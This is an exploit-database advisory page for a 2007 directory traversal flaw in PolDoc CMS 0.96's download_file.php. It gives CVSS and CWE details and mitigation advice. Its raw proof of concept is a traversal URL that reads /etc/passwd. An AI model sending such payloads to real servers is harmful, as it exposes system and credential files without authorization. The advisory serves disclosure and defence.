header-logo
Suggest Exploit
vendor:
PolDoc CMS
by:
milw0rm.com
5.5
CVSS
MEDIUM
Remote File Disclosure
22
CWE
Product Name: PolDoc CMS
Affected Version From: 0.96
Affected Version To: 0.96
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PolDoc CMS 0.96 (download_file.php filename) Remote File Disclosure Vulnerability

This vulnerability allows an attacker to disclose files on the target system by exploiting the download_file.php script in PolDoc CMS version 0.96. By manipulating the 'filename' parameter in the URL, an attacker can traverse directories and access sensitive files, such as the /etc/passwd file.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of PolDoc CMS that includes a patch for this issue. Alternatively, the affected script can be modified to validate user input and prevent directory traversal attacks.
Source

Exploit-DB raw data:

PolDoc CMS 0.96 (download_file.php filename) Remote File Disclosure Vulnerability
D . Script : http://sourceforge.net/project/showfiles.php?group_id=100272
POC : /download_file.php?filename=../../../../../../../../etc/passwd

# milw0rm.com [2007-12-08]